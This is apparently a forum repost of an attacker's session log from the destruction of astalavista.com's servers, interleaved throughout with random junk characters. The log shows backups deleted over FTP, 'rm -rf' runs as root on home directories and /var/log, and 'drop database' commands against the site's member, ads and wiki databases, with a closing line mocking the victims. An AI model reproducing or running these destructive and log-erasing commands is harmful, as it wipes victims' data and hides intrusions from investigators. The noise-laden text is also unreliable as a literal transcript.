n6 Z: l- v5 Q# C& G5 V; A- W3 j+ u-rw-rw-rw- 1 astalavista.com users 88287111 Apr 29 15:57 09-04-29-astacom_sql_full.sql.tar.bz2
* V/ |/ X( G& s" Q; V-rw-rw-rw- 1 astalavista.com users 26413034040 May 2 00:21 09-05-01-astacom-Public_HTML.tar
6 M. z0 Z9 Y" A$ e* J& G-rw-rw-rw- 1 astalavista.com users 277843549 May 1 17:29 09-05-01-astacom-SQL_Dump.tar& H, c) b8 n ?1 P/ |+ G
[snip]
l5 Q1 t) \$ ?2 k/ h. [1 `2 f# `5 z/ i226 Transfer complete.. [% q: X, G! P- C4 a2 O/ Z
ftp> mdelete *: P! m1 q, t! ~) M5 p2 ]6 a+ w+ h
ftp> ls -la# s; x% L$ P1 b6 W" r
227 Entering Passive Mode (212,254,194,163,2,193)5 h- Q( t; k) T/ H
150 Opening BINARY mode data connection for ‘file list’.
7 K, _9 @2 a6 t5 V9 I9 @226 Transfer complete.
2 ]2 E3 [/ O8 n$ V6 _ftp>
* E3 j* a s: g) K, R
, ~+ N. d" P3 e! Ysh-3.2# cd /home' P+ E- t, `5 c- K. y
sh-3.2# ls -la
% Z1 S" s+ A' g1 e7 {total 120
# k# ?0 q5 |/ F0 o6 f2 tdrwxr-xr-x 14 root root 4096 Mar 11 17:56 .
0 R! s& U5 z8 Q1 _- z2 Tdrwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
! C8 X( k# [/ p& G( f- Q) qdrwx–x–x 9 admin admin 4096 Nov 28 2007 admin
2 z `" j/ U6 v! j' `. d-rw——- 1 root root 8192 Jun 4 03:03 aquota.group# ~# T6 F2 s2 `4 I# N- v% J' W
-rw——- 1 root root 8192 Jun 3 02:45 aquota.user9 E W$ U' x3 n) g$ v
drwx–x–x 6 astanet astanet 4096 Jun 4 09:51 astanet, r2 V3 ~$ d( T8 q ~
drwxr-xr-x 2 root root 4096 Jul 29 2008 backup
0 R; t& {1 y8 i/ w, T Hdrwxr-xr-x 2 root root 4096 Sep 17 2008 backup.14161! v7 m, I7 k( [
drwx–x–x 10 com com 4096 Apr 28 12:40 com
+ K# ^5 C: l3 x) Odrwxr-xr-x 2 root root 4096 May 17 2007 ftp9 r2 w2 `# h: |- Q3 U4 Z' }3 d4 { z9 r' X
drwx—— 3 jon jon 4096 Sep 21 2007 jon
6 G$ E8 ?( v% L6 J" \2 o4 r5 Ndrwx—— 2 root root 16384 Sep 11 2007 lost+found7 w* R# c2 X, |! V$ w$ `2 d
drwxr-xr-x 2 root root 4096 Sep 14 2007 my
6 i. F/ W0 d# `drwxr-xr-x 5 mysql mysql 4096 Sep 24 2007 mysqldata- L+ Z3 G2 z; s3 @8 K3 q
drwx—— 2 jon jon 4096 Sep 15 2007 test
# ? R# e8 ^( r) V& |drwxrwxrwt 2 root root 4096 Jul 29 2008 tmp
6 ]( N& |9 p* A0 G7 X) H. d3 X
6 X' O1 l& L6 N5 \+ ?sh-3.2# rm -rf backup/
; u% K# G" v% U& U; tsh-3.2# rm -rf backup.14161/2 _0 M- e$ H4 ^+ E* P" O
sh-3.2# rm -rf ftp/! y1 ?9 B0 _1 a4 o( `' M1 p
sh-3.2# rm -rf jon/4 b4 m( Z: U$ M. K& s. E
sh-3.2# rm -rf my/
E: V: ?& m6 b' B$ g$ \sh-3.2# rm -rf mysqldata/
8 S' h5 B2 \4 z/ v2 i# y! T# x- ~- fsh-3.2# rm -rf test/
4 }) |) C! \' c' @. i. j+ rsh-3.2# rm -rf tmp/! B' w/ @3 e; g$ c) w6 S% g I
sh-3.2# cd ~+ j# v* [8 Q: p
sh-3.2# rm -rf *2 z8 E9 ]/ M; K' N
sh-3.2# rm -rf /var/log/8 x, D! l, u1 s
rm: cannot remove directory `/var/log//proftpd’: Directory not empty) N* G- O+ h7 ~. S& g
sh-3.2# rm -rf /home/*
% ^. E+ t* o1 Ssh-3.2# mysql, ?4 `# D& f* T7 S Z3 D/ c
Welcome to the MySQL monitor. Commands end with ; or \g.
1 j/ q ~: H* o( j% JYour MySQL connection id is 407156
5 _, R4 H. l. U% nServer version: 5.0.45-community-log MySQL Community Edition (GPL); [, u3 k1 W3 ]; |3 T
v$ R3 f; k( C, u8 D
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.6 {& q) t# n- N6 g5 ?* C' c
" P6 R1 ~6 J/ E7 c9 A
mysql> show databases;
/ L: x. F- e. ~4 w n+———————–+
5 V; [$ @# r8 y% v8 M! {| Database |
U r q' T2 x$ e! _+———————–+7 @: ]; }9 ~% @, d9 E5 F. s
| information_schema |
, H' e6 j( J/ f& c| astanet_ads |
2 U, F; Y1 r, l2 K9 `/ ]) W4 T| astanet_mailing_lists |
+ m5 d- T9 \9 z6 } o/ P8 {| astanet_mediawiki |
0 p( V0 a' d( e# _$ J2 d) c| astanet_membersystem |( R7 L' m |" [' z8 N5 F% J
| com_contrexx |0 U" m& t' v/ P
| com_contrexx2 |( Y; I! O/ t1 c V
| com_contrexx2_live |
& u6 t) f) f/ k: @, V( V| da_roundcube |/ \$ ^8 |. S% F" Q
| dolphin |7 t3 G# G4 v/ k* l% }/ _/ ~ T& B
| ideapool |
1 w+ ~- ^* v: \% ^& P9 l3 G' }| mysql |! Y7 n$ Y$ W0 o7 r
| test |2 z3 M: ?- y9 _+ w' ]. h3 T
| yourmaster |" L1 N8 ~5 K9 s6 U
+———————–+
5 I& p h) C# i14 rows in set (0.03 sec)0 Q$ V- [& u8 z; h+ B
$ g" B* H1 T# D' w: p& h* G- H) }mysql> drop database astanet_membersystem;5 B8 W1 c7 g0 S9 {$ ]
droQuery OK, 46 rows affected (0.81 sec)
|' |7 `+ @* t7 E% t; H, O) H5 e2 \- y6 \/ K$ H
mysql> drop database com_contrexx;
6 ?4 a9 N6 X& [9 Z0 G/ x+ Y& }Query OK, 211 rows affected (2.72 sec)6 G8 p) j$ a: h: P) o: F/ R' m
/ i/ z$ o2 H: r, i# \: smysql> drop database com_contrexx2;% R- K% f7 K3 t, Y. \2 g) B. E5 d
Query OK, 237 rows affected (2.23 sec)
@8 L) r: G# a# P( G* B3 I2 F$ ^- v7 ]# W2 N7 ^7 ^7 B3 f
mysql> drop database com_contrexx2_live;
( P* `' H1 `9 [Query OK, 227 rows affected (7.63 sec)' r2 {* P( f) _; _2 |2 G1 O
( _+ W) _- V6 omysql> drop database ideapool;+ L# ]3 r- m. \/ v }4 c
Query OK, 69 rows affected (0.19 sec)* D1 ~, L6 ?* F6 z+ H" f
9 E) z4 e+ ]0 z/ ]
mysql> drop database yourmaster;
6 ]. N( r" B% C* {' q8 {6 cQuery OK, 158 rows affected (0.55 sec)4 ?0 c4 u& n, _7 o( v5 N
; n5 ]% n V% R( J8 K. g- A9 e$ g
mysql> drop database astanet_ads;; x* U5 f2 R. W1 g- f$ a, i
Query OK, 9 rows affected (0.11 sec)
& M" v( [7 {" I( I, X1 q
' G2 V4 o* f8 S2 e% S, a/ Lmysql> drop database astanet_mailing_lists;- Q5 B2 J5 W( H9 g$ t
Query OK, 24 rows affected (1.47 sec)1 C4 h& r( E! |* r: f
" ~! ?" U* V; m7 Y6 fmysql> drop database astanet_mediawiki;% t T1 V$ W9 K l( @
Query OK, 31 rows affected (0.51 sec)) b6 k5 L M. g8 O4 @: p4 j
/ a2 v1 o+ R `1 ?mysql> show databases;
/ w" f( l8 q% e0 S7 W+——————–+( h0 D3 N/ r& i6 L4 S- d9 ]
| Database |
2 o' p& T3 U* h @1 P8 y8 @( w+——————–+
; Z& q9 d& u# n- j- G2 g| information_schema | e/ d; ^8 x: ]
| da_roundcube |( b/ \0 T7 S, I; f7 l! N* V
| dolphin |
8 L$ R: V+ H' y$ u) S8 \| mysql |
3 A. ^, l9 j/ K5 T: H/ R& S) ?| test |
: }) s: A) e7 x9 {7 R( z: I, k+——————–+ I8 K% v/ a" w
5 rows in set (0.00 sec); M% j' o( M* c g/ _
, s0 x. V) D) {& Q$ m% T# nWhat a journey! We’re not sure exactly why the “Terminator” had any influence on
4 q3 d( k* X& s' H F! c2 z! htheir naming (conventions) but we’re sure Arnold himself wouldn’t be in the' E2 W! z# u( M4 S3 j, n
wrong to say this pack of morons *wont be back*.
% r) l4 c- w0 a2 ]# O |
发表于 2012-11-6 21:07:34
收藏
支持
反对